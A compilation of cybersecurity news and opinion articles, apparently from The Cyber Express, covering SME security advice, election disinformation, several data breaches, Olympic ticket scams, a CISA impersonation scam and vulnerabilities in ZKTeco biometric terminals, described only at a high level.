By: Abhilash R., Head of Cybersecurity at OQ Trading In a progressively digital world, small and medium sized enterprises (SMEs) are not immune to cyber threats. Despite their size, SMEs are prime targets for cyberattacks due to their limited resources and perceived vulnerability. Therefore, implementing robust cybersecurity strategies is imperative to safeguard sensitive data, maintain customer trust, and ensure business continuity. This article delves into five essential cybersecurity strategies tailored to SMEs, emphasizing their importance, and providing cost effective solutions.

Employee Education and Training

One of the most critical cybersecurity strategies for SMEs is ensuring that employees are educated and trained in cybersecurity best practices. Human error remains a significant factor in cyber incidents, making cybersecurity awareness training indispensable. Employees should be educated on recognizing phishing attempts, creating strong passwords, and understanding the importance of software updates. Importance: Employees serve as the first line of defence against cyber threats, they are also the weakest links in cybersecurity. By educating them, SMEs can significantly reduce the risk of successful cyberattacks. Solutions: Implement regular cybersecurity training sessions for all employees, covering topics such as identifying suspicious emails, safe internet browsing practices, and responding to security incidents. Utilize online training resources and simulations to reinforce learning effectively. You can develop internal cybersecurity awareness materials using free or low cost presentation tools such as Google Slides or Microsoft PowerPoint. Create engaging presentations covering topics like identifying phishing emails, password best practices, and responding to security incidents. Additionally, leverage free online resources such as cybersecurity blogs, webinars, and tutorials to supplement employee training efforts. Encourage participation in online courses offered by reputable cybersecurity organizations, some of which may be available at no cost.

Implementing Multi-Factor Authentication (MFA)

Multifactor authentication (MFA) adds an extra layer of security by requiring users to provide multiple forms of verification before accessing sensitive data or systems. This strategy helps mitigate the risk of unauthorized access, even if passwords are compromised. Importance: Passwords alone are no longer sufficient to protect against cyber threats. MFA significantly enhances security by requiring additional authentication factors, such as biometric data or one-time codes. Solutions: Implement MFA for all accounts with access to sensitive information or critical systems. Many cloud-based services and software applications offer built-in MFA capabilities, making implementation relatively straightforward and cost effective. Utilize built-in MFA features provided by cloud-based services and software applications, many of which offer MFA functionality at no additional cost. Implement open source MFA solutions that can be customized to fit the organization's specific needs without incurring licensing fees. Alternatively, explore low-cost MFA options offered by third-party providers, ensuring compatibility with existing systems and scalability as the business grows.

Regular Data Backups

Data loss can have devastating consequences for SMEs, ranging from financial losses to reputational damage. Regularly backing up data is essential for mitigating the impact of ransomware attacks, hardware failures, or accidental deletions. Importance: Data backups serve as a safety net, allowing SMEs to recover quickly in the event of a cyber incident. Without backups, businesses risk permanent loss of valuable information. Solutions: Automate regular backups of critical data to secure cloud storage or offline storage devices. Utilize backup solutions that offer versioning capabilities, allowing businesses to restore data to previous states if necessary. Utilize cloud based backup solutions that offer affordable storage options and automated backup scheduling. Leverage free or low cost backup software with basic features for backing up critical data to secure cloud storage or external hard drives. Implement a combination of full and incremental backups to optimize storage space and minimize backup times. Explore open source backup solutions that provide flexibility and customization options without the need for expensive proprietary software.

Network Security Measures

Securing the network infrastructure is crucial for protecting against external threats and unauthorized access. SMEs should implement robust network security measures, such as firewalls, intrusion detection systems (IDS), and virtual private networks (VPNs). Importance: Networks are prime targets for cyberattacks, making network security measures essential for preventing unauthorized access and data breaches. Solutions: Deploy firewalls to monitor and control incoming and outgoing network traffic. Implement IDS to detect and respond to suspicious activities within the network. Utilize VPNs to encrypt data transmissions and establish secure connections for remote workers. Implement open source firewall solutions that provide robust network protection without the high cost associated with commercial firewalls. Utilize free or low cost intrusion detection system (IDS) software that offers essential features such as real time monitoring and threat detection. Explore cost effective virtual private network (VPN) solutions tailored to SMEs' needs, such as subscription based services with affordable pricing plans and easy deployment for remote workers.

Regular Security Assessments and Updates

Cyber threats are constantly evolving, requiring SMEs to stay vigilant and proactive in their cybersecurity efforts. Regular security assessments and updates help identify vulnerabilities and ensure that systems and software are up to date with the latest security patches. Importance: Cyber threats are continuously evolving, making regular security assessments and updates essential for maintaining strong cybersecurity posture. Solutions: Conduct regular security assessments to identify potential vulnerabilities in systems, networks, and applications. Develop and implement a patch management strategy to ensure that software and firmware updates are applied promptly. Conduct internal security assessments using free or low cost vulnerability scanning tools to identify potential weaknesses in systems and networks. Utilize open source penetration testing frameworks to simulate cyberattacks and assess the effectiveness of existing security measures. Implement a systematic approach to applying security patches and updates, leveraging free tools provided by software vendors or community driven initiatives. Additionally, establish internal processes for monitoring security advisories and alerts issued by relevant authorities to stay informed about emerging threats and vulnerabilities. In conclusion, cybersecurity is a critical concern for SMEs in today's digital landscape. By implementing the strategies explained above, SMEs can significantly enhance their cybersecurity posture without breaking the bank. Investing in cybersecurity is not only essential for protecting sensitive data and maintaining business operations but also for safeguarding the long-term viability and reputation of SMEs in an increasingly interconnected world. About Author: Abhilash Radhadevi, a seasoned cybersecurity leader, serves as the Head of Cybersecurity at OQ Trading, bringing over two decades of comprehensive experience in the Banking, Financial, Oil and Energy sectors. Widely recognized for his adept leadership, Abhilash has effectively steered international organizations through intricate security challenges. His illustrious career includes spearheading pioneering cybersecurity strategies, resulting in prestigious awards and acclaim. Beyond his professional achievements, Abhilash maintains a global influence and demonstrates unwavering commitment to mentoring, showcasing his dedication to shaping the future landscape of cybersecurity. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

By Hoda Alkhzaimi The technological prowess of small nations is increasingly recognized as a significant driver of global economic power. This is because technology is a great equalizer; it can enable small nations to leapfrog development stages and compete on a global scale. For instance, the UNCTAD Technology and Innovation Report 2021 highlights that frontier technologies like AI, robotics, and biotechnology have the potential to significantly boost sustainable development, while also posing the risk of widening the digital divide. Small nations, by embracing these technologies, can foster innovation, improve productivity, and create high-value industries that contribute to global trade and economic growth. Moreover, the digital transformation allows for the democratization of information and resources, enabling smaller economies to participate in markets traditionally dominated by larger countries. The OECD also emphasizes the role of SMEs in adapting to a more open and digitalized environment, which is essential for inclusive globalization. Therefore, the technological development of small nations is not just about national progress; it's about contributing to and shaping the global economic landscape. By investing in technology and innovation, small nations can assert their presence on the world stage, influencing global trends and economic policies. Cyber conflicts have emerged as a significant factor in international relations, influencing the dynamics of power in the digital age. The Atlantic Council's Cyber Statecraft Initiative highlights the shift from traditional deterrence strategies to more proactive measures like Defend Forward and Persistent Engagement, reflecting the evolving nature of cyber threats. Research published in Armed Forces & Society suggests that cyber conflicts, termed 'cool wars', are reshaping interactions between states, with denial-of-service attacks and behaviour-changing tactics significantly affecting state relations. Moreover, the ICRC has raised concerns about the protection of civilians from cyber threats during armed conflicts, emphasizing the need for legal and policy frameworks to address the digital risks in warfare. The CyberPeace Institute's analysis of cyberattacks in the context of the Ukraine conflict provides valuable data on the harm to civilians and the evolution of cyber threats. Additionally, the European Repository of Cyber Incidents offers an extensive database of cyber incidents, which can serve as a resource for understanding the scope and impact of cyber warfare. These insights underscore the importance of cyber capabilities in asserting influence and the need for robust cyber defence mechanisms to safeguard national security and civilian welfare in the face of digital threats. The interplay between cyber operations and political power is complex, and as technology continues to advance, the implications for international stability and power hierarchies will likely become even more pronounced

The Role of Misinformation and Disinformation in Cyberconflict

Misinformation and disinformation play a critical role in the landscape of cyberconflict, shaping public perception and influencing the dynamics of geopolitical tensions. A report by Full Fact highlights the detrimental impact of false information on democratic societies, emphasizing the need for informed citizenship to combat the spread of such information. Similarly, data from UNESCO underscores the pervasive risk of encountering disinformation across various media platforms, with statistics indicating a significant trust deficit in media and an increase in the manipulation of news consumption. The cybersecurity sector also recognizes disinformation as a substantial threat, with a study by the Institute for Public Relations revealing that 63% of Americans view disinformation as a major societal issue, and nearly half of cybersecurity professionals consider it a significant threat to security. These concerns are echoed globally, as a survey found that over 85% of people worry about the impact of online disinformation on their country's politics. The intertwining of misinformation, disinformation, and cyberconflict presents a complex challenge that requires a multifaceted approach, including media literacy, regulatory frameworks, and international cooperation to mitigate its effects and safeguard information integrity.

The Role of Big Tech in Cyberconflict Interplay

The role of big tech companies in cyber conflict is a complex and evolving issue. These companies often find themselves at the forefront of cyber conflict, whether as targets, mediators, or sometimes even participants. For instance, during civil conflicts, digital technologies have been used to recruit followers, finance activities, and control narratives, posing additional challenges for peacemakers. The explosive growth of digital technologies has also opened new potential domains for conflict, with state and non-state actors capable of carrying out attacks across international borders, affecting critical infrastructure and diminishing trust among states. In response to the invasion of Ukraine, big tech companies played crucial roles in addressing information warfare and cyber-attacks, showcasing their significant influence during times of conflict. Moreover, the technological competition between major powers like the United States and China further highlights the geopolitical dimension of big tech's involvement in cyber conflict. These instances underscore the need for a robust framework to manage the participation of big tech in cyber conflict, ensuring that their capabilities are harnessed for peace and security rather than exacerbating tensions.

Hedging the Risks of Using AI and Emerging Tech To Scaleup Misinformation and Global Cyberconflicts

In response to the growing threat of election misinformation, various initiatives have been undertaken globally. The World Economic Forum has identified misinformation as a top societal threat and emphasized the need for a concerted effort to combat it, especially in an election year with a significant global population going to the polls. The European Union has implemented a voluntary code of practice for online platforms to take proactive measures against disinformation, including the establishment of a Rapid Alert System and the promotion of fact-checking and media literacy programs. In the United States, the Brennan Center for Justice advocates for active monitoring of false election information and collaboration with internet companies to curb digital disinformation. Additionally, the North Carolina State Board of Elections (NCSBE) provides guidelines for the public to critically assess the credibility of election news sources and encourages the use of reputable outlets. These initiatives represent a multifaceted approach to safeguarding the integrity of elections by enhancing public awareness, improving digital literacy, and fostering collaboration between governments, tech companies, and civil society. In the ongoing battle against election misinformation, several key alliances and actions have been formed. Notably, the AI Elections Accord was proposed for public signature at the Munich Security Conference on February 16, 2024. This accord represents a commitment by technology companies to combat deceptive AI content in elections. In a similar vein, Meta established a dedicated team on February 26, 2024, to address disinformation and the misuse of AI leading up to the European Parliament elections. Furthermore, the Federal Communications Commission (FCC) in the United States took a decisive step by making AI-generated voices in robocalls illegal on February 8, 2024, to prevent their use in misleading voters. These measures reflect a growing recognition of the need for collaborative efforts to safeguard the integrity of elections in the digital age. The alliances and regulations are pivotal in ensuring that the democratic process remains transparent and trustworthy amidst the challenges posed by advanced technologies. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Globe Life disclosed a recent cybersecurity incident that may have resulted in unauthorized access to its consumer and policyholder information. Globe Life is a Texas-based insurance holding company. It offers life, health, and worksite insurance products and services to consumers nationwide through its subsidiaries. The company has over 3,600 employees and also owns several insurance providers like Liberty National, United American and Family Heritage Life. The company had also been accused of shady financial tactics and business operations by short sellers Fuzzy Panda Research and Viceroy Research, allegations the company has denied.

Globe Life Breach Discovery and Containment

According to Globe Life's filing with the SEC, the company had conducted a security review on one of its web portals to discover potential vulnerabilities that may have affected its access permissions and user identity management. The investigation was prompted by a legal inquiry from a state insurance regulator on June 13, 2024. The review revealed that an unauthorized party may have accessed the company's web portal, compromising sensitive customer and policyholder data. The company stated that it had immediately revoked external access to the affected portal upon breach discovery. Globe Life said that at this stage, it believes the security issue is isolated to the one web portal. All other company systems remain fully operational. Globe Life added that it expected minimal impact to its business operations after the take down of the affected web portal. The company has activated its cybersecurity incident response plan and engaged external forensics experts to investigate the breach's scope. In its SEC filing, Globe Life disclosed that the investigation remains ongoing. The full impact and nature of the incident are unclear at the moment.

Incident Comes After Scrutiny Over Business Tactics

The company said it has yet to determine if the breach qualifies as a reportable cybersecurity incident under the SEC's disclosure rules. The disclosure comes amidst increasing scrutiny and financial setbacks suffered by the company. The Texas-based insurer has faced allegations of fraudulent sales tactics and other business and workplace improprieties. The short sellers Fuzzy Panda Research and Viceroy Research had made these allegations public in April 2024. While the company has continued to deny these claims, its share price has dropped by 24% since the publication of the Fuzzy Panda report. The reports claimed that Globe Life and its biggest subsidiary, American Income Life (AIL), had engaged in insurance fraud, framing of policies for dead and fictitious individuals, withdrawal of consumer funds without approval, unfair dismissal, misleading sales tactics and illegal kickbacks. They also alleged that some of AIL's most profitable agents had faced accusations of kidnapping, assault and child grooming from defendants, witnesses and plaintiffs. It remains unclear if the state insurance regulator contact that led to the breach discovery is related to these allegations. Insurers like Globe Life are regulated at the state level rather than federal level. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The UK, US and Canada have accused Russia of an elaborate plot to interfere in Moldova’s upcoming presidential election and referendum on EU membership. The allegations came in a joint statement released on the opening day of the G7 summit, pointing to a far-reaching campaign of political meddling by Moscow. The three nations claim Russia is actively spreading disinformation to 'undermine Moldovan democratic institutions' and 'degrade public confidence' in the government ahead of the votes on October 20th. Specific targets include President Maia Sandu and her pro-Western administration, which has strongly backed Ukraine in the Russia-Ukraine conflict.

Kremlin Actors Seeking to Discredit Moldova's Leaders

According to a statement from the U.S. Embassy in Russia, Russian threat actors are aggressively distributing propaganda to “foment negative public perceptions” of President Sandu. This involves fabricating electoral irregularities while also aiming to incite protests if the incumbent president is re-elected. The plot dates back years, with the Kremlin providing support to fugitive Moldovan businessman Ilan Shor. Shor had previously been sentenced to 15 years in prison in connection with the disappearance of $1 billion from Moldovan banks in 2014. All three countries had issued sanctions on Shor for his connection to the incident. The statement singled out Russian state-television channel RT for providing several years of support to Shor. The UK, US and Canada claim they have already shared detailed evidence with Moldovan authorities to enable further investigation and disruption. They also state they will continue backing Moldova with a range of support measures as it deals with Russian interference and fallout from the Ukraine war.

All Three Countries Announce Support at G7 Summit

The three nations expressed confidence in Moldova's ability to manage these threats linked to Russian interference. They have taken several measures to support Moldova's efforts, including:

• The sharing of detailed information with Moldovan partners to investigate, thwart, and put a stop to the Kremlin's plans.
• Increasing accountability and punishment for individuals and entities involved in covertly financing political activities in Moldova through sanctions and potential further actions.
• Strongly supporting Moldova's democratic, economic, security, and anti-corruption reforms, as well as its deepening European integration.

The three nations affirmed their support deepening ties between Moldova and the EU. President Sandu is widely perceived as a firmly pro-Ukranian and pro-Western leader since her election in 2020. In reaction, the Kremlin appears intent on preventing her re-election in order to install a more Russia-friendly president. By publicizing the interference plot, the Western allies hope to deter Moscow while urging respect for Moldovan sovereignty and free, fair elections. However, with under five months until the votes, concerns remain high over Russia's determination to influence election results. "We will continue to stand with all of our friends, partners, and Allies in defense of our shared democratic values and freedoms," the statement read. The U.S. embassy's statement also highlighted the surrounding threat to elections in 2024, a year in which "hundreds of millions of people across Europe and North America go to the polls to select their leaders in European, national, regional, and local elections."

Russia Is a Threat to Election Security: Researchers

An earlier report from Mandiant in April suggested that Russia presented the biggest threat to election security in the United States, United Kingdom and European Union. “Multiple Russian groups have targeted past elections in the U.S., France, and Ukraine, and these groups have continued to demonstrate the capability and intent to target elections both directly and indirectly,” the report stated. Experts also fear Russian attempts at spreading disinformation or influencing public opinion on non-election events such as the upcoming 2024 Summer Olympics in Paris. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

As anticipation builds for the upcoming Paris 2024 Summer Olympic Games, security researchers and officials have observed an uptick in scams abusing legitimate Olympics branding. French Gendarmerie officials discovered over 300 bogus ticketing sites aiming to steal money and personal information by deceiving individuals who are in a hurry to book tickets for the events. Recent research investigates a prominent example (paris24tickets[.]com) from these websites. The site appears among the top paid results in Google searches and promotes itself as a secondary marketplace for sports and live events tickets.

Website Incorporates Official Paris 2024 Summer Olympic Games Branding

The 'paris24tickets[.]com' website appeared professional and legitimate at first glance. The site advertised itself as a “secondary marketplace for sports and live events tickets,” and was displayed as the second result among sponsored Google search results for 'paris 2024 tickets.' It allowed visitors to navigate through upcoming Olympic events, select event specific tickets, and enter payment information. Its polished design resembled that of trusted ticketing platforms, along with the official Olympics ticket purchase site. Proofpoint researchers warned that the website was entirely fraudulent despite its authentic look and feel. The site was likely collecting users’ financial and personal information rather than actually processing ticket orders. The researchers acted swiftly to suspend the misleading domain upon its discovery. [caption id="attachment_77366" align="alignnone" width="2800"] Impersonating domain 'paris24tickets[.]com' (Source: archive.org)[/caption] [caption id="attachment_77365" align="alignnone" width="2800"] Official Olympics Ticketing Site (Source: https://tickets.paris2024.org)[/caption] The researchers noticed that in some cases, the scammers even sent emails promising "discounts" on coveted tickets to victims. This tactic was likely done to lure unsuspecting individuals, who may have been desperate to secure tickets at lower costs. Victims who have provided their personal or financial information on the fraudulent website risk having their identities and money stolen. The scammers behind these websites may also collect important personal data, such as names, contact information, and credit card details, for sale or further malicious campaigns.

French Gendarmerie Nationale Reported the Discovery of 338 Scam Sites

The 'paris24tickets[.]com' website represents just a tiny fraction of a much broader network of fraudulent Olympics domains. The French Gendarmerie Nationale had identified approximately 338 such websites since March 2023, and made subsequent efforts to shut them down; 51 of these sites were stated to have been closed while 140 of them were put on notice. The fraudsters behind these scams likely rely on sponsored search engine ads and targeted emails to drive traffic to impersonating websites. Offers of special deals and discounts are further lures to draw-in potential victims. [caption id="attachment_77367" align="alignnone" width="1000"] Source: Shutterstock[/caption] 200 French gendarmes had been mobilized as a distinct unit to monitor the internet and various different social networks for Olympics ticketing-related fraud and mass resales, under the direction of the Europol. These units work along with the DGCCRF (Directorate General for Consumer Affairs, Competition and Fraud Prevention) in France. Captain Etienne Lestrelin, director of operations at the unit, told France Info radio that social media such as Facebook, Leboncoin, Telegram and Instagram were often “the primary source of resale attempts.” He added, “This is an exchange from individual to individual. Except that the buyer does not know if the person really owns the tickets, since they are virtual tickets, not tickets paper. So people are selling you wind, we don't know what they're selling." Lestrelin advised that tickets sold at too low of a price can alert potential buyers: "You will never have a ticket below its original cost. The goal of people who were able to buy tickets in volume and with the intention of reselling them, it is to make a profit So it is an alert if you find a much cheaper ticket. The sentence to remember is that there is no. very good deals on the internet, it's not possible." He instructed that it was also not possible to own a ticket before the event begins and QR Codes are generated. Anyone who claims to be currently in possession of a ticket, or owns tickets that seem visually legitimate, is still a fraud. He warned buyers to be vigilant about buying such tickets outside of official sources because it can also be an offense. "You are associating yourself with the offense that the seller commits when he resells without going through the official website. This is a criminal offense," he stated. To validate purchases, buyers can cross-check provided references with the official Paris 2024 Summer Olympic Games application. Buyers who suspect that they may have been duped can report to a police station, a gendarmerie or the DGCCRF. Legitimate ticket purchases can be made through the official ticketing website or official sub-distributor network.

A significant data breach has exposed the private information of more than 1,200 Baw Baw Shire residents who contacted customer service after-hours over a nearly two-year period, the Baw Baw Shire council revealed. The breach occurred at OracleCMS, a third-party call center contracted by the council to field inquiries outside normal business hours. It reportedly does not impact the council's own systems and databases.

Over 1,200 Baw Baw Shire Residents Affected

The exposed information includes customer contact details and call notes—dates from June 2014 to January 2016 when customers rang the council hotline during evenings, weekends and holidays. Calls made during the specified period had been automatically forwarded to OracleCMS call agents. It remains unclear precisely how the contractor failed to protect confidential constituent information or when the company first discovered the breach. Upon learning of the breach earlier this month, Baw Baw officials urgently contacted every affected resident—over 1,250 in total—through SMS messages and personal calls to vulnerable groups like the elderly. While the breach did not infiltrate Baw Baw's systems directly with the council's own systems, it represents a alarming security gap by a third-party vendor given access to constituents' sensitive information.

OracleCMS Provider Implicated in Other Breaches

Authorities are currently investigating the incident, which may have also impacted other clients of the Australia-based company. OracleCMS provides outsourced contact center services for an array of local governments and organizations. OracleCMS had previously been implicated in a long list of data breaches affecting several different cities in Australia. According to some official press release statements, OracleCMS appeared to initially downplay the incident. An earlier release from Merri-bek City Council stated:

OracleCMS informed Council in April that there had been a cyber security incident where identifiable information of customers had been compromised. Until last week we were informed that Council’s customer data was not involved. Council has now been informed that the OracleCMS data breach does include records of calls handled by OracleCMS on Council’s behalf. We take the privacy of our customers very seriously and we are taking urgent action to address this issue.

The OracleCMS data breach also affected some businesses such as several entities belonging to Nissan in the Australia and New Zealand region, such as Nissan Financial Services Australia Pty Ltd, Nissan Motor Co. Pty Ltd, Nissan Financial Services, New Zealand Pty Ltd and Nissan New Zealand Ltd.

OracleCMS subsequently suffered a data breach, which it was alerted to on 15 April 2024. This separate incident resulted in certain data which was held by OracleCMS, including the summary information Nissan provided to OracleCMS, being compromised and published on the dark web.

As cyberattacks surge, some have questioned whether outsourcing critical customer service channels renders individuals and businesses more vulnerable to data theft. The incident serves as reminder for governments and organizations to lock down vulnerabilities present in third-party vendors or tools while conducting regular security audits. Residents with concerns regarding the breach may contact Baw Baw Shire Council’s customer service line at +61 3 5624 2411. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The Toronto District School Board is investigating a recent ransomware attack that affected its testing environment. The Toronto board is Canada's largest school board, serving approximately 238,000 students across 600 schools in the city of Toronto. The board stated that it had taken immediate action and launched an investigation upon becoming aware of possible intrusion.

Toronto District School Board's Investigation Underway

The school board stated that the incident had affected its testing environment, which had been used to evaluate new technology and programs before being deployed on systems. The board's cybersecurity team had taken immediate action upon discovering the incident, securing systems and preserving data. The Toronto District School Board had notified details of the incident to the Toronto police and the Information and Privacy Commissioner of Ontario. [caption id="attachment_77136" align="alignnone" width="2800"] Source: www.tdsb.on.ca[/caption] In its letter of notification sent to parents and guardians, the Toronto District School Board stated that it had launched an investigation with the aid of third-party experts to fully assess the nature and scope of the incident. This includes potential compromise of its networks or breach of sensitive personal information. [caption id="attachment_77137" align="alignnone" width="1770"] Source: www.tdsb.on.ca[/caption] The letter added, "If it is determined that any personal information has been impacted, we will provide notice to all affected individuals. We understand that news of a cyber incident is concerning, but please know that we are doing everything possible to learn more about what occurred and address this situation.

Impact Unknown; More Details Expected Soon

Despite the attack, the district school board's systems remained fully operational and functional. While only the school's testing environment had been affected, Humber College cybersecurity expert Francis Syms remained concerned over the incident, as personal information is sometimes used on test environments. He added that test environments are usually not secured by multifactor authentication, potentially making data easier to access. However, he admitted that he was not aware of the testing system being used, as he was not part of the investigation team. The Toronto District School Board did not clarify whether the testing environment or its data contained any personal information. Ryan Bird, a spokesperson from the school district board, disclosed to CityNews Toronto that the full extent of the breach was unknown, or if any personal data had been compromised in the attack, but further details would be revealed by the end of the day. The Cyber Express team has reached out to the Toronto District School Board for further details and investigation results, but no responses have been received as of yet. Toronto's cybersecurity defenders have observed an uptick in cyberattacks in recent years, from both financially-motivated hackers and 'hacktivists' disrupting public systems. Some attacks occur during sensitive times such as elections, global conflicts, or visits by foreign leaders. However, ransomware attacks remain the most common form of attacks. City officials have been working with several agencies to rebuild trust in the safety of public systems and services. Charles Finlay, Toronto resident and executive director at Rogers Cybersecure Catalyst, had earlier stated to the Toronto Star, “I think the city has to be more forthcoming about what it is doing to ensure that those services are secure from cyber-attacks.” The City had witnessed several attacks on its public institutions such a Cl0p ransomware intrusion into the  City of Toronto's computer systems as well as an attack last year on the Toronto Public Library's computer systems. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert about a recent impersonation scam in which scammers posed as its representatives and employees. Fraudsters in the campaign may extort money in various ways, such as bank transfers, gift cards or cryptocurrency payments.

CISA Impersonation Scam

The spammers behind the campaign make phone calls to victims in which they claim to be contacting targets on behalf of CISA; they then ask victims to share personal information or money under the guise of protecting their accounts from unauthorized activity. Fraudsters may also direct victims to download additional software or click on links to "verify" their identity. However, CISA confirmed that it would never make such demands. "CISA staff will never contact you with a request to wire money, cash, cryptocurrency, or use gift cards and will never instruct you to keep the discussion secret," CISA warned. Possible red flags to watch out for:

• Unsolicited phone calls that claim to be from CISA.
• Callers requesting personal information, such as passwords, social security numbers, or financial information.
• Callers demanding payment or transfer of money to "protect" your account.
• Callers creating a sense of urgency or pressuring you to take immediate action.

If you're targeted by a CISA impersonation scam, here's what you should do:

• Do not pay the caller.
• Take record of  the numbers used.
• Hang up the phone immediately while ignoring further calls from suspicious numbers.
• Report the scam to CISA by calling (844) SAY-CISA (844-729-2472).

FTC Observes Uptick in Impersonation Scams

The CISA impersonation scam is a recent example of the rise in impersonation fraud targeting both businesses and government agencies. According to the latest data from the Federal Trade Commission (FTC), the number of such scams has increased dramatically in recent years, and cost consumers more than $1.1 billion in 2023 alone. The FTC report showed that in 2023, the agency received more than 330,000 reports of fraud posing as a business and almost 160,000 reports of fraud posing as a government. Collectively, these incidents account for almost half of all fraud cases reported directly to the FTC. "The financial injury is breath-taking – and cash-taking," the FTC quipped in its Spotlight. It further added, "Reported losses to impersonation scams topped $1.1 billion in 2023, more than three times what consumers reported in 2020." While fraudsters employ various types of scams, the FTC noted that the below types accounted for nearly half of the reported/observed scams in 2023:

1. Copycat account security alerts: Scams that pretend to impersonate legitimate services such as Amazon while purporting to be about unauthorized activity or charges to their account.
2. Phony subscription renewals: Usually email notices that alert targets of auto-renew charges to various online services.
3. Fake giveaways, discounts, or money to claim: Fake rewards or winnings that claim to originate from legitimate providers such as internet providers or large retailers.
4. Bogus problems with the law: Scammers try to deceive targets into believing that their identity had been used to commit heinous crimes such as money laundering or the smuggling of drugs.
5. Made-up package delivery problems: Messages that alert you of fake delivery problems with legitimate delivery services such as the U.S. Postal Service, UPS, or FedEx.

To avoid such scams, the FTC has advised consumers to not click on unexpected links or messages, avoid scenarios where gift cards are offered as an option to fix problems, and scrutinize urgent offers and claims. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Kaspersky researchers discovered widespread vulnerabilities in biometric terminals developed by ZKTeco, which are known to be deployed internationally. These flaws could be exploited by threat actors to bypass authentication, steal sensitive data, and even gain full control over affected terminals. The vulnerabilities pose a major risk, as these biometric terminals are often white-labeled to be sold under various brand names by multiple distributors. They are also widely used in high-security/sensitive environments, such as nuclear power plants, chemical plants or hospitals while storing thousands of facial templates.

Vulnerabilities in ZKTeco Biometric Terminals

Biometric terminals see multiple uses aside from their primary purpose of acquiring biometric data such as fingerprints, voices, facial features, or irises. They can be connected to other scanners to support alternative authentication methods, or be deployed as a means of ensuring employee productivity or to reduce fraud. These devices see increasing usage in confidential facilities such as power plants, executive suites or server rooms. ZKTeco biometric terminals support facial recognition(with the ability to store thousands of face templates), password entry, electronic pass, and QR codes. Researchers conducted several tests to assess the security and reliability of these devices, finding 24 different vulnerabilities that may be exploited by threat actors in real attack scenarios on confidential facilities:

• 6 SQL injection vulnerabilities
• 7 buffer stack overflow vulnerabilities
• 5 command injection vulnerabilities
• 4 arbitrary file write vulnerabilities
• 2 arbitrary file read vulnerabilities

The researchers grouped some of the more critical vulnerabilities present in these devices by their attack type:

• Physical Bypass via Fake QR Codes CVE-2023-3938 allows cybercriminals to perform a SQL injection attack by injecting malicious code into access strings. This could allow them to gain unauthorized entry to restricted areas.
• Biometric Data Theft and Backdoor Deployment The CVE-2023-3940 and CVE-2023-3942 vulnerabilities could give attackers access to sensitive user data and password hashes stored on the device. Additionally, CVE-2023-3941 could allow them to remotely alter device databases, allowing them to potentially add unauthorized individuals into systems or create a backdoor.
• Remote Code Execution The CVE-2023-3939 and CVE-2023-3943 flaws enable the execution of arbitrary commands or code on the device, effectively giving attackers full control and the ability to launch further attacks on the wider network.

Georgy Kiguradze, Senior Application Security Specialist at the cybersecurity firm, expressed concern over the risks posed by these vulnerabilities in real scenarios, risks posed by deepfake and social engineering tactics, and the urgency of immediately patching these vulnerabilities. He stated:

“The impact of the discovered vulnerabilities is alarmingly diverse. To begin with, attackers can sell stolen biometric data on the dark web, subjecting affected individuals to increased risks of deepfake and sophisticated social engineering attacks. Furthermore, the ability to alter the database weaponizes the original purpose of the access control devices, potentially granting access to restricted areas for nefarious actors. Lastly, some vulnerabilities enable the placement of a backdoor to covertly infiltrate other enterprise networks, facilitating the development of sophisticated attacks, including cyberespionage or sabotage. All these factors underscore the urgency of patching these vulnerabilities and thoroughly auditing the device's security settings for those using the devices in corporate areas.”

Mitigating Risks to Biometric Terminals

The researchers stated that they had disclosed all information about the discovered vulnerabilities to ZKTeco, but lacked accessible data on whether these vulnerabilities had been patched. The researchers have shared the following recommendations to protect these biometric terminals from attacks in the meanwhile:

• Isolate biometric reader usage into a separate network segment.
• Employ robust administrator passwords and change default ones.
• Audit and fortify the device's security settings, including enabling temperature detection.
• If feasible, minimize the use of QR code functionality.
• Regularly update the device's firmware.

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

A resident of Moreton Bay, Australia was shocked to discover that the private information of several resident ratepayers in the region, including their friends and neighbors, had been accidentally published on the Moreton Bay council's official website. The leaked information included names, residential addresses, email addresses, and phone numbers, as well as resident complaints to the council and details about council investigations.

Data Breach Discovered By Local Resident

City of Moreton Bay resident Piper Lalonde, who works as a data analyst, had discovered the breach along with her husband. They were shocked to learn that their personal information was freely available on the council's customer request online portal. The couple had discovered that the information included their phone numbers,  complaints, and requests that they had made for new bins, along with the GPS coordinates of where the requests had been filed. A further investigation into the breach had revealed that the personal information of some of their friends and neighbors who were fellow ratepayers were also available in the records after they conducted a search. Piper reported this information to the council, with the website being taken down the next day. However, she was still unsatisfied with the lack of notification about the incident to impacted residents. Piper stated, "I would expect they'd have to send out some formal communication letting people know their information was publicly accessible, but there was no indication they were going to do that." She expressed concern about the possibility of people stumbling upon complaints made about them by other residents. She added, "If this gets in the wrong hands — it just takes one person to see a complaint about them, and who knows what they'll do."

City of Moreton Bay Responses to Data Breach

After Piper's report, the website was said to be taken down. The site appears to be functional as of now, with some functions still limited. The website includes an official notice in response to the incident. [caption id="attachment_76878" align="alignnone" width="2204"] Source: moretonbay.qld.gov.au[/caption]

We are experiencing system difficulties with our customer request portal. Our third-party provider is investigating a possible information breach. The cause is yet to be determined but there is no indication this is a cyber attack. We will never contact you via unsolicited calls to request sensitive information. No action is required from you at this stage. We will continue to keep you informed.

